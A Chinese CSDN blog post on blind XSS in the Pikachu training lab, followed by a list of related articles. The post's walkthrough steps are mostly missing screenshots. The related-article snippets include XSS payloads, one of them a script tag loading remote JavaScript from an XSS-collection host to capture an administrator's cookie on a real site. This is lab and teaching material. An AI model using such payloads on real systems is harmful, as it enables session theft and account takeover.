XSS的盲打以及实验的演示

最新推荐文章于 2024-08-14 16:24:24 发布
最新推荐文章于 2024-08-14 16:24:24 发布
阅读量784 收藏 3
点赞数
分类专栏: Pikachu实验过程
本网站/论坛/博客为编辑作品,整体著作权属于本人(筱楠)所有。本网站/论坛/博客许可他人建立友情链接,但链接所指向的内容应是本网站/论坛/博客首页。未经本人许可不得随意转载
本文链接:https://blog.csdn.net/gl620321/article/details/89604485
版权

一.XSS的盲打
XSS绕过的姿势有很多种,取决于你的思路和对前端技术的掌握
xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定的。
在网页源代码中查看自己在前端输入的内容时“CTRL+F”即可输入
1.打开pikachu中的XSS之盲打在这里插入图片描述
2.打开右上角的提示链接网页到后台查看自己的提交情况
在这里插入图片描述
在这里插入图片描述
二。XSS的绕过思路讲解
在这里插入图片描述
在这里插入图片描述
操作过程
在这里插入图片描述
可以打开网页查看源代码
三.XSS之htmlspecialchars()函数绕过
在这里插入图片描述
在网页中查看源代码
在这里插入图片描述
在这里插入图片描述
四.XSS的防范措施及href和js输出点
1.XSS之href输出
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
2.XSS之js输出
在这里插入图片描述
在这里插入图片描述

Serendipity_筱楠
关注
专栏目录
某次日常xss盲打
召唤大白的博客
03-09 310
今天接到个渗透测试的活,基本上就是静态站,本来也不报啥希望了,扫了一圈整个站就一个留言功能,根据经验一般留言就是在标签里,所以右键查看下元素,确定留言内容确实在里面,随手一个xss盲打未拦截,成功提交留言。 盲打使用的xss平台的默认模块Payload: ccc”</tExtArEa><sCRiPt sRC=https://xss8.cc/CnQ6></sCrIpT><textarea> 快下班时意外收到了弹回来的cookie,并且定位到了该站后台地址如下图,
XSS盲打
weixin_44749329的博客
05-19 3667
XSS盲打 XSS盲打:它不是一种XSS漏洞的类型,它其实是一种XSS一种的攻击场景。 以下来实施XSS的一种盲打 1.打开pikachu里的XSS盲打 2.输入一个字符来测一下看它有什么样的作用,点击提交后显示如图这句话 仿佛在说我们输入的内容并不会在前端输出,看起来好像是被提交到了后台,它的管理员有可能会被看,只有他的管理员能看到我输入的内容,前端的用户是看不到的 3.我们来设想一种...
XSS盲打与cookie劫持
最新发布
m0_74249600的博客
08-14 950
本文紧接上篇文章讲述了XSS盲打、cookie劫持以及靶场实践,请关注持续更新(本文部分内容来自课件,如有版权问题请与我联系)
pikachu靶场第十关——XSS(跨站脚本)之xss盲打(附代码审计)
yzasts的博客
03-21 613
和之前的存储型xss不同,这里提交的数据并不会返回到页面中,而是提交到后台,在无法登录后台的情况下,就只能盲打。不过这里为了学习漏洞,我们直接登录后台,用户名:admin,密码:123456。这里有两个输入,一个content,一个name。
XSS漏洞---XSS盲打
Ethan024的博客
03-13 286
XSS漏洞(本文仅供技术学习与分享) XSS盲打 实验准备: 皮卡丘靶场; 实验步骤: 输入无害字符串来查看效果,发现该字符串已经提交到后台; 输入一个JavaScript脚本 — alert(2222) 发现也并没有弹框 3. 登录管理员界面查看后台,发现登录就会弹框 4. 其本质就是XSS存储型漏洞。 ...
3-9xss盲打以及盲打实验演示
山兔的博客
04-27 1050
什么是XSS 盲打xss盲打其实不是一种xss漏洞类型,他说的其实是一种攻击场景 也就是说只有后台会看到前端输入的内容。从前端无法判断是否存在XSS,怎么办? 不管3721,往里面插XSS代码,然后等待,可能会有惊喜! 由于是后端,可能安全考虑不太严格,当管理员登录时,就会被X! 我们切换到pikachu上面来,我们在输入框随便输入字符,看一下,他是怎么样的作用 仿佛在说,我们输入的内容,并不会在前端输出,看起来被提交到后台,也就是说,只有管理员,才有可能看到我们输入的内容,其它用户是看不到的,我们
服务器搭建XSS盲打平台,绕坑
CC__Faker的博客
05-07 1508
文章目录环境介绍环境搭建平台搭建平台使用 环境介绍 本次搭建环境采用的是ubuntu20,php,apache2,无需数据库 XSS平台项目名称:BlueLotus_XSSReceiver 项目地址:https://github.com/trysec/BlueLotus_XSSReceiver 环境搭建 sudo apt update 更新源 sudo apt install apache2 安装apache sudo systemctl status apache2 查看apac
XSS盲打演示和讲解;XSS绕过思路讲解和案例演示XSS绕过关于htmlspecialchars()函数;XSS常见防范措施
qq_44696653的博客
05-04 895
XSS盲打演示和讲解 当只有后台会看到前端输入的内容而前端无法判断是否存在XSS时,我们可以插入XSS代码。这个时候由于后端的安全考虑往往不会很严格,所以当管理员登陆的时候就会被X。 在pikachu上具体的实验演示; 1.在XSS盲打模块根据前端的提示输入相关信息,发现输入的信息只会反馈给后台,在前端无法显示。这里就可以不管别的直接输入跨站脚本的内容 例如:<script>alert...
xss盲打(通过xss盲打盗取管理员账号和密码!)
qq_43814486的博客
05-03 6663
原理: 其实和一般的xss原理是一样的,不同的地方在于xss盲打的结果你看不到,你不知道它是否存在xss漏洞,因为xss盲打的结果是显示在管理员后端的,但是这并不意味着不存在xss漏洞!只要payload被执行,就存在漏洞! 上面说了一大堆,现在来点干东西!我要通过xss盲打这种漏洞盗取他们管理员的账号和密码!!!操作如下: 1,我输入的payload: <script>documen...
【网络安全】XSS盲打实战案例:某网页漫画
HBohan的博客
01-18 2417
"XSS盲打"是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的XSS攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发XSS来实现攻击者预定好的“真实攻击功能”。
【网络安全】实操XSS订单系统漏洞(利用盲打
你在看屏幕的同时,屏幕也在注视着你
09-07 4194
xss订单靶场实战
xss盲打以及盲打实验演示
北冥有鱼
04-22 2299
什么是xss盲打? 我们直接来到ipkachu的xss盲打页面进行演示 我们随便输入几个字符 发现我们的输入不会在前端输出,只会在后台输出,只有管理员能看到我们的内容 我们按照之前的思路输入一下payload,当然前端也没有输出 我们点一下提示会发现有登陆后台的地址,那我们就去登陆一下这个后台 登录进去后发现刚才的payload果然被插入进去了 这种情况其实就属于xss盲打,这个漏洞...
pikachu之XSS分类、场景(钓鱼、盲打、过滤)
m0_59856804的博客
12-20 1313
Xss pikachu 保存型xss 反射型、DOM型 xss钓鱼 Xss盲打 XSS过滤 XSS之htmlspecialchars Htmlspecialchars()函数 XSS之href输出 防范措施: 21
Pikachu靶场之(XSS盲打)
qq_45754781的博客
06-07 2141
XSS入门之PikachuXSS盲打
Pikachu靶场:XSS盲打
witwitwiter的博客
04-17 2129
Pikachu靶场:XSS盲打 实验环境以及工具 Firefox浏览器、Burp Suite、Pikachu靶场 实验原理 ●xss盲打也是属于存储型XSS类型 盲打的意思是无法直接在前端看到反馈效果。 xss盲打类型交互的数据会被存在在数据库里面,永久性存储,一般出现在留言板,问卷调查等页面。 形成XSS漏洞的主要原因是程序对输入和输出的控制不够严格,导致“精心构造”的脚本输入后,在输到前端时被浏览器当作有效代码解析执行从而产生危害。存储型XSS漏洞跟反射型形成的原因一样,不同的是存储型XSS下攻击者可以
xss盲打、过滤、htmlspecialchars、herf输出、js输出
weixin_51446936的博客
06-02 1873
一、XSS盲打 1.盲打概述 “xss盲打”是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定好的“真实攻击功能”。 也就是只有从后台才能看到前端输入的内容,从前端无法判断是否存在xss 2.实验演示 第一步:打开pikachu的xss盲打,随便输入信息 第二步:模拟后台管理员,登录后台进行查看(右上角
实验29:xss盲打以及盲打实验演示
qq_44720671的博客
04-29 260
xss盲打 当输入的内容被提到后台,前端无法查看,只有管理员可见。这种情况是盲打。 例如,我们以pikachu为例,打开xss盲打。 当输入完成并提交后,出现: 我们无法看到返回结果,这时我们可以选择盲打。 先输入: < script>alert(‘xni’)</ script> 然后,打开提示 输入网址,登录到管理员后台 然后我们就可以发现,后台被弹窗了。因为...
pikachu靶场 xss漏洞
winofkill的博客
12-18 562
pikachu靶场的xss漏洞
写一个python脚本检测pikachu靶场的xss盲打
06-03
好的,下面是一个简单的 Python 脚本,用于检测 pikachu 靶场的 XSS 盲打漏洞。 ```python import requests # 构造请求 url = "http://your-pikachu-url.com/vulnerabilities/xss_s/" payload = "<script>alert('...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值